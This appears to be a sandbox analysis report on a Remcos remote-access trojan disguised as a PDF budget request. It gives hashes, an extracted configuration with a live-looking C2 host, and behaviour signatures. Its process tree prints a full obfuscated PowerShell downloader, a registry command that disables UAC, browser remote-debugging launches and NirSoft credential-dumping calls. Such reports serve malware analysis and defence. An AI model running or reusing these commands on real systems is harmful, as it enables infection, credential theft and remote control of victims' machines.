Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2024 06:12

General

  • Target

    KAHILINGAN NG BADYET 25-11-2024·pdf.vbs

  • Size

    15KB

  • MD5

    27dea77c551972fd2bb8bd517f463ae5

  • SHA1

    ba8e8f876acc945e8d54e4bde0f977885d4e1e7e

  • SHA256

    c54fe72cd2d9c6c765835e6b3d4d0318851551439ecb8043fdb74643b1ae7256

  • SHA512

    22ac1d8c8249ff3bd9e5b361ee37bb5dedbcd408e1b96a3a2287b66c8ba84852f86faaf8b1c16896cfb4686234163d67831bf4142317a5b24d2c68adc9a9f4c3

  • SSDEEP

    384:iYZZHxr+H3eqR8fYvajRsTc4a+OXxgEPnk+jIEN:/ZHxr+HhQYvajRUEjhZRjIi

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

hg575438h-0.duckdns.org:23458

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WNVZ5S

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\KAHILINGAN NG BADYET 25-11-2024·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Dribling='Informationsudvekslingerne';;$Rucksack='Fisketurs';;$Hugst='Thankworthy';;$Svampeangrebenes='Ddblegt';;$Preinitialized='Belap197';;$Carelessnesses=$host.Name;function neonlys($Reciprokvrdierne){If ($Carelessnesses) {$Kombineringer=4} for ($Untracked=$Kombineringer;;$Untracked+=5){if(!$Reciprokvrdierne[$Untracked]) { break }$Tanniferous+=$Reciprokvrdierne[$Untracked]}$Tanniferous}function Fejlstatistikkers($Traskede){ .($Marched) ($Traskede)}$Middelstands=neonlys 'SuggnAcroeVsketNabo. K.nWHypee GliBgh,tC Bl,LTolvI aftECaluNAn tt';$Ureterostomy=neonlys 'LawsMP.ndoGre z Kayi Jeel Ghal sptaUlst/';$Casanovaer=neonlys 'PurpT rinlG.ttsGra 1Over2';$Fragmentation='P.ra[MineNFelsEdaabT hol.HighS uglEDis r.robVBussIServC ulte,nyoPSundOKugliOneiN UkoT SlamRes A kifnjaniASackgPerfeT erR Wag]Isog:Dump:Bu tSMoreESnorC JaguQ.ipRA eaIFondTbj gY liPFrydrI.kuOsporTBrejOPhthCplasO GenLS,mi= Toc$RkebCToldAFlytSFarbaBl anMonoo SupV CamABe uEFarvR';$Ureterostomy+=neonlys 'Nidi5Calc.Insu0Skif Samm(ProdW noniPavenGenedSouloSpndwNonds ipp V.luNNi.aTchro Mea 1Peta0Gabe. Ga 0Flyv; O e Gla WUnini CopnJogg6 roc4 Jaf;Ekvi Aut.xCe.e6Reve4 or;Komm presrS riv Afl:Laps1Unse3 arv1Mine.,kog0Conc) to GombGEl,te Cosc ntekF,iso Opl/Isab2 yss0Sali1Bro 0Rets0 Skr1 Ril0Un,i1Inge HysFTr.piFranrTeate elkfMesso PouxSkan/Unre1Tama3Roc 1 Pho.Linj0';$Hulkortsoperatrer=neonlys 'Lnliu rocsA.lee Arcr uba-Eks APhytG U se VelnRhinT';$orgeats=neonlys ' oddhSk ttBe.ttD.mapChafsRyk :Poly/Fo,e/FamedSp rrflotiEncovG uneVand.ForagMasto,oveo tjlgFamilO ykePlum.N nacWhipo StamSmkf/LanduGrinctong?Non.e SluxKogepExito UnsrCryptBle.= Extd NonoSolowProfnDecolT anoIocsaAffodFade&UdkoiGread ing= f l1holdJTranBBuckZreg z TilNDatat Setb Nonk Aku1B.svKretsUSub sPreez Bl oMalao etrfFabrWv,hiwRype7 antHForssunbrQPostfS,rvD Ndeh vni0Cots6Ski 6UnploWal.N StbtUdvaf';$Greenwoods=neonlys 'Im.u>';$Marched=neonlys 'R.veIForueExe x';$cardiolith='Cedars';$Honestone='\hocks.Bio';Fejlstatistikkers (neonlys ' bla$K algSt.mLFissODiesb Tr a GgeLCitr: ngeTFjelISe.sr For=K,in$MandeAntiN StaVBesm:,iamA Cenp OphP jeddmickAHar tVoldaC.ng+Vand$InduHtechOEffunA,reE RecS PasTB anoSurrNPredE');Fejlstatistikkers (neonlys 'Fall$ rbigSpecl OpkOAlmiBBippALegolProc:liftaboflnRoomTAkrohOllerCaruo Frep oncoEtatN entyAk,uM Sme=Brev$TiamoHe,zr,dseGSakkeFremaDamiTdropsFlyv. erSTyngP nlalBantIBractKldn(M,na$NedlgAnglR IndEPrefeUbetNSymbwIso.oFalcoToleD LamSCh m)');Fejlstatistikkers (neonlys $Fragmentation);$orgeats=$Anthroponym[0];$Pilhenvisninger=(neonlys ' B.c$ DetgF,shlIndeOU reB Ti,ASludL Br :AntiBF amR PriLA.alEBac nGo,bEA tr=OutbnIndke ReaWSton-ErnrO arebTeglJ ConeNonsc KostPer, MorgsUndeyBadeS arctKvinEsmilm P i.,ruk$AlfimDiscI usdUns D Rv EBubbLLympsZostTMaalA MesNSt ydUlc.s');Fejlstatistikkers ($Pilhenvisninger);Fejlstatistikkers (neonlys 'C ra$ riBSpumrTyktlF hoe gawnKloaeDesc. Ca H ytheManea.imidSam eLnmorFarvsUdgo[Indb$ UhrH LaauVic llappkSabroti er Sk,tUdf sStanoDyrepRetiehandrTetaa undtLednr ccueHaanrM sk]So t=Cath$ eceURealrInteeLip,tmueseFinar LanoA,gmsLesbt okuoS lemTegny');$Mesophragm=neonlys ' Pop$MeleBF.nar RealKo teStewn Krie,iro.UnseDWhedo Anow,ildnSlutlDishoArreaDe ed SloFU deiUncllTr beSimu( nte$RecooWaywr eing trye Kv.aMedit MarsTerm,Comp$JamaL PosaB evzSla.yLuftl.uaeeDatag Bods Bac)';$Lazylegs=$Tir;Fejlstatistikkers (neonlys 'Strb$UgekgSkriLRmesOG okBP nia atLYtte:Overd,aleA ankZDormAOmel=Forp(photTBandET rnSIn eTUdby-Fea.PArbeaA.seTV lih Fi Arch$ama lSvinAKlynZLadtY ParlVitaeFiskgRoersPaas)');while (!$Daza) {Fejlstatistikkers (neonlys 'Forb$ Intg ChelF,reoBaggbDrama sval.ari:MultS Lreu emirO erfuigemParaa Sumn E ds onoh HaaidiplpUden=Topf$ EleS Stia Ga rUrugcO feiRe ltSubaiSends') ;Fejlstatistikkers $Mesophragm;Fejlstatistikkers (neonlys 'Hem s nditUmbeAEldrRStbetKaka- E gS GebLBo,de mi.E StyPFlle An,n4');Fejlstatistikkers (neonlys 'Pseu$F ldGBegrLF,lmoUltiB In.aBry,lValf:Gen dIdelAAnimzCheca.koh= Ana(SupetHagleDiscstatatN ti-ChroPMek aIn btFo,shOria B kl$ S.rl AbbAHispZthorYAr.cL nusE .igg his Ark)') ;Fejlstatistikkers (neonlys 'Fors$ W tG rinLHeteogivtB,ranaBjelLSeng: Or,mNo pEsafeDS,anIUltrI Beh= Pe $ Me.gDev,l ypeO morBKartAAfhnLUncr:HyalFSvano,fserSangbPeb RSek.Y.umodAmyreFarvRBun BEfteaIgnoNSoldeEjerSChok+Ledn+Cos %K ld$R,abaWrisNB.matSacch bunrVenaOBa,bP Trao No NPausy rbm Cop.RumaCstraoPubouAr,oN ulnT') ;$orgeats=$Anthroponym[$Medii]}$Censorkorps=327032;$Ajatsa183=30997;Fejlstatistikkers (neonlys 'Afsk$ ordgkildlBakoO st,b orpaSkall R v:PresRTra IBri.KBacksBe ndA ara B,ogFupmENbesn Pri2Anse0Ligb5 Bor S gn=B me Formg LyneDi gTCry -SprecGraboA keNsammTTraneAutoNmu iTS fr Head$AngelLkkeaParaz WhiYCo,tl subEStewGTiptS');Fejlstatistikkers (neonlys 'Y.ir$ katgDustlConaoTechb skiaTutelIkas:tandFBundiLibeb SjaeC arr t.osAntipDysmr O enVin.gS vknV,lsiTheon DokgLovpeParanMang .fv=klas ,ale[NoncSYorkyExcisWatst HypeTndsm bob. EncC PacoBolonJagtvOpg,eaandr,lvetAbd ],onu: Ch :Kur,FHakkrTe ao Haam MyxBOvera ,elsLor e,mbl6Sieg4DiskS.omptIm arChi,iA trnOldeg Gla( Har$OmdbRforsiFolkkJo,dsSm gd.riea h.ggPreceBundnbill2Lota0E.st5 Sha)');Fejlstatistikkers (neonlys 'Nonc$kataG P ilRen,OMercbCurtaPubhl,nau:DumflHandObr kv.oneFDispoStikREterTDor oJugel Rogkp rsnSkovI KahnAcr GFetaE GldrVgmanSkatEBr d Ldb =Bede Indf[ SmosNiogYtovtSNonfT,ntiEAccem en.NervtResoeklo xsun,t,ord.BeakEApomNPa tC Su oAg,eDForriKr bNCaltgPisi]Inh :P da:UndeaC okSTak,CCy,eiStoci ske.Orthg ,axEO.trT ,esS LicT horRU laIUndeNContGSeqq(Styr$ClapfUnpriAdvaBDebtES okRCu,rS.ubepCargRchloNAudiG Fo,nSelvibostNN nrg TroEPa.mnAna )');Fejlstatistikkers (neonlys 'Perl$U,kaG,sciLVaa OErytBSeptARe cLGymn: K,mP onIPa.tNBrisKVggee.oliRUnsp= nan$ElatL ,onORu.fVUninFUnc OForhRVarmtConfOKaryL Unlk MalNKrypiHelhNCo.iGStrye ColRD lan SmaeEmot.Dvr SU,pruMlkebHvd.sNeddTDentRSki,I itnPensg ri(Vejr$.helC U.aEAndenS nkSK gloIdiorWavikBogaO EscR nsepP,opS Fje, G l$BabyaBen JFurnAOmsttPiloSKejtaAvit1l,mi8S.er3V nd)');Fejlstatistikkers $Pinker;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4864
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Dribling='Informationsudvekslingerne';;$Rucksack='Fisketurs';;$Hugst='Thankworthy';;$Svampeangrebenes='Ddblegt';;$Preinitialized='Belap197';;$Carelessnesses=$host.Name;function neonlys($Reciprokvrdierne){If ($Carelessnesses) {$Kombineringer=4} for ($Untracked=$Kombineringer;;$Untracked+=5){if(!$Reciprokvrdierne[$Untracked]) { break }$Tanniferous+=$Reciprokvrdierne[$Untracked]}$Tanniferous}function Fejlstatistikkers($Traskede){ .($Marched) ($Traskede)}$Middelstands=neonlys 'SuggnAcroeVsketNabo. K.nWHypee GliBgh,tC Bl,LTolvI aftECaluNAn tt';$Ureterostomy=neonlys 'LawsMP.ndoGre z Kayi Jeel Ghal sptaUlst/';$Casanovaer=neonlys 'PurpT rinlG.ttsGra 1Over2';$Fragmentation='P.ra[MineNFelsEdaabT hol.HighS uglEDis r.robVBussIServC ulte,nyoPSundOKugliOneiN UkoT SlamRes A kifnjaniASackgPerfeT erR Wag]Isog:Dump:Bu tSMoreESnorC JaguQ.ipRA eaIFondTbj gY liPFrydrI.kuOsporTBrejOPhthCplasO GenLS,mi= Toc$RkebCToldAFlytSFarbaBl anMonoo SupV CamABe uEFarvR';$Ureterostomy+=neonlys 'Nidi5Calc.Insu0Skif Samm(ProdW noniPavenGenedSouloSpndwNonds ipp V.luNNi.aTchro Mea 1Peta0Gabe. Ga 0Flyv; O e Gla WUnini CopnJogg6 roc4 Jaf;Ekvi Aut.xCe.e6Reve4 or;Komm presrS riv Afl:Laps1Unse3 arv1Mine.,kog0Conc) to GombGEl,te Cosc ntekF,iso Opl/Isab2 yss0Sali1Bro 0Rets0 Skr1 Ril0Un,i1Inge HysFTr.piFranrTeate elkfMesso PouxSkan/Unre1Tama3Roc 1 Pho.Linj0';$Hulkortsoperatrer=neonlys 'Lnliu rocsA.lee Arcr uba-Eks APhytG U se VelnRhinT';$orgeats=neonlys ' oddhSk ttBe.ttD.mapChafsRyk :Poly/Fo,e/FamedSp rrflotiEncovG uneVand.ForagMasto,oveo tjlgFamilO ykePlum.N nacWhipo StamSmkf/LanduGrinctong?Non.e SluxKogepExito UnsrCryptBle.= Extd NonoSolowProfnDecolT anoIocsaAffodFade&UdkoiGread ing= f l1holdJTranBBuckZreg z TilNDatat Setb Nonk Aku1B.svKretsUSub sPreez Bl oMalao etrfFabrWv,hiwRype7 antHForssunbrQPostfS,rvD Ndeh vni0Cots6Ski 6UnploWal.N StbtUdvaf';$Greenwoods=neonlys 'Im.u>';$Marched=neonlys 'R.veIForueExe x';$cardiolith='Cedars';$Honestone='\hocks.Bio';Fejlstatistikkers (neonlys ' bla$K algSt.mLFissODiesb Tr a GgeLCitr: ngeTFjelISe.sr For=K,in$MandeAntiN StaVBesm:,iamA Cenp OphP jeddmickAHar tVoldaC.ng+Vand$InduHtechOEffunA,reE RecS PasTB anoSurrNPredE');Fejlstatistikkers (neonlys 'Fall$ rbigSpecl OpkOAlmiBBippALegolProc:liftaboflnRoomTAkrohOllerCaruo Frep oncoEtatN entyAk,uM Sme=Brev$TiamoHe,zr,dseGSakkeFremaDamiTdropsFlyv. erSTyngP nlalBantIBractKldn(M,na$NedlgAnglR IndEPrefeUbetNSymbwIso.oFalcoToleD LamSCh m)');Fejlstatistikkers (neonlys $Fragmentation);$orgeats=$Anthroponym[0];$Pilhenvisninger=(neonlys ' B.c$ DetgF,shlIndeOU reB Ti,ASludL Br :AntiBF amR PriLA.alEBac nGo,bEA tr=OutbnIndke ReaWSton-ErnrO arebTeglJ ConeNonsc KostPer, MorgsUndeyBadeS arctKvinEsmilm P i.,ruk$AlfimDiscI usdUns D Rv EBubbLLympsZostTMaalA MesNSt ydUlc.s');Fejlstatistikkers ($Pilhenvisninger);Fejlstatistikkers (neonlys 'C ra$ riBSpumrTyktlF hoe gawnKloaeDesc. Ca H ytheManea.imidSam eLnmorFarvsUdgo[Indb$ UhrH LaauVic llappkSabroti er Sk,tUdf sStanoDyrepRetiehandrTetaa undtLednr ccueHaanrM sk]So t=Cath$ eceURealrInteeLip,tmueseFinar LanoA,gmsLesbt okuoS lemTegny');$Mesophragm=neonlys ' Pop$MeleBF.nar RealKo teStewn Krie,iro.UnseDWhedo Anow,ildnSlutlDishoArreaDe ed SloFU deiUncllTr beSimu( nte$RecooWaywr eing trye Kv.aMedit MarsTerm,Comp$JamaL PosaB evzSla.yLuftl.uaeeDatag Bods Bac)';$Lazylegs=$Tir;Fejlstatistikkers (neonlys 'Strb$UgekgSkriLRmesOG okBP nia atLYtte:Overd,aleA ankZDormAOmel=Forp(photTBandET rnSIn eTUdby-Fea.PArbeaA.seTV lih Fi Arch$ama lSvinAKlynZLadtY ParlVitaeFiskgRoersPaas)');while (!$Daza) {Fejlstatistikkers (neonlys 'Forb$ Intg ChelF,reoBaggbDrama sval.ari:MultS Lreu emirO erfuigemParaa Sumn E ds onoh HaaidiplpUden=Topf$ EleS Stia Ga rUrugcO feiRe ltSubaiSends') ;Fejlstatistikkers $Mesophragm;Fejlstatistikkers (neonlys 'Hem s nditUmbeAEldrRStbetKaka- E gS GebLBo,de mi.E StyPFlle An,n4');Fejlstatistikkers (neonlys 'Pseu$F ldGBegrLF,lmoUltiB In.aBry,lValf:Gen dIdelAAnimzCheca.koh= Ana(SupetHagleDiscstatatN ti-ChroPMek aIn btFo,shOria B kl$ S.rl AbbAHispZthorYAr.cL nusE .igg his Ark)') ;Fejlstatistikkers (neonlys 'Fors$ W tG rinLHeteogivtB,ranaBjelLSeng: Or,mNo pEsafeDS,anIUltrI Beh= Pe $ Me.gDev,l ypeO morBKartAAfhnLUncr:HyalFSvano,fserSangbPeb RSek.Y.umodAmyreFarvRBun BEfteaIgnoNSoldeEjerSChok+Ledn+Cos %K ld$R,abaWrisNB.matSacch bunrVenaOBa,bP Trao No NPausy rbm Cop.RumaCstraoPubouAr,oN ulnT') ;$orgeats=$Anthroponym[$Medii]}$Censorkorps=327032;$Ajatsa183=30997;Fejlstatistikkers (neonlys 'Afsk$ ordgkildlBakoO st,b orpaSkall R v:PresRTra IBri.KBacksBe ndA ara B,ogFupmENbesn Pri2Anse0Ligb5 Bor S gn=B me Formg LyneDi gTCry -SprecGraboA keNsammTTraneAutoNmu iTS fr Head$AngelLkkeaParaz WhiYCo,tl subEStewGTiptS');Fejlstatistikkers (neonlys 'Y.ir$ katgDustlConaoTechb skiaTutelIkas:tandFBundiLibeb SjaeC arr t.osAntipDysmr O enVin.gS vknV,lsiTheon DokgLovpeParanMang .fv=klas ,ale[NoncSYorkyExcisWatst HypeTndsm bob. EncC PacoBolonJagtvOpg,eaandr,lvetAbd ],onu: Ch :Kur,FHakkrTe ao Haam MyxBOvera ,elsLor e,mbl6Sieg4DiskS.omptIm arChi,iA trnOldeg Gla( Har$OmdbRforsiFolkkJo,dsSm gd.riea h.ggPreceBundnbill2Lota0E.st5 Sha)');Fejlstatistikkers (neonlys 'Nonc$kataG P ilRen,OMercbCurtaPubhl,nau:DumflHandObr kv.oneFDispoStikREterTDor oJugel Rogkp rsnSkovI KahnAcr GFetaE GldrVgmanSkatEBr d Ldb =Bede Indf[ SmosNiogYtovtSNonfT,ntiEAccem en.NervtResoeklo xsun,t,ord.BeakEApomNPa tC Su oAg,eDForriKr bNCaltgPisi]Inh :P da:UndeaC okSTak,CCy,eiStoci ske.Orthg ,axEO.trT ,esS LicT horRU laIUndeNContGSeqq(Styr$ClapfUnpriAdvaBDebtES okRCu,rS.ubepCargRchloNAudiG Fo,nSelvibostNN nrg TroEPa.mnAna )');Fejlstatistikkers (neonlys 'Perl$U,kaG,sciLVaa OErytBSeptARe cLGymn: K,mP onIPa.tNBrisKVggee.oliRUnsp= nan$ElatL ,onORu.fVUninFUnc OForhRVarmtConfOKaryL Unlk MalNKrypiHelhNCo.iGStrye ColRD lan SmaeEmot.Dvr SU,pruMlkebHvd.sNeddTDentRSki,I itnPensg ri(Vejr$.helC U.aEAndenS nkSK gloIdiorWavikBogaO EscR nsepP,opS Fje, G l$BabyaBen JFurnAOmsttPiloSKejtaAvit1l,mi8S.er3V nd)');Fejlstatistikkers $Pinker;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4060
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4420
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:536
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1292
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffff3b4cc40,0x7ffff3b4cc4c,0x7ffff3b4cc58
          4⤵
            PID:4496
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,10945437158060674220,11216321418549090325,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2
            4⤵
              PID:5116
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2012,i,10945437158060674220,11216321418549090325,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:3
              4⤵
                PID:4960
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,10945437158060674220,11216321418549090325,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8
                4⤵
                  PID:2016
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,10945437158060674220,11216321418549090325,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:5072
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,10945437158060674220,11216321418549090325,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3292
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3700,i,10945437158060674220,11216321418549090325,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4356 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:2148
              • C:\Windows\SysWOW64\msiexec.exe
                C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qdhuutdpmmvgoqvdcvmz"
                3⤵
                  PID:1448
                • C:\Windows\SysWOW64\msiexec.exe
                  C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qdhuutdpmmvgoqvdcvmz"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2236
                • C:\Windows\SysWOW64\msiexec.exe
                  C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\afmmvmojaunlyerplgzabhvs"
                  3⤵
                  • Accesses Microsoft Outlook accounts
                  • System Location Discovery: System Language Discovery
                  PID:5048
                • C:\Windows\SysWOW64\msiexec.exe
                  C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\dzsfoezlocfybkftcrlcduqbogw"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3652
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                  3⤵
                  • Uses browser remote debugging
                  • Enumerates system info in registry
                  • Modifies registry class
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  PID:4864
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffff3a046f8,0x7ffff3a04708,0x7ffff3a04718
                    4⤵
                      PID:5028
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16861055556123552075,5092969293023260907,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
                      4⤵
                        PID:3132
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16861055556123552075,5092969293023260907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
                        4⤵
                          PID:1592
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
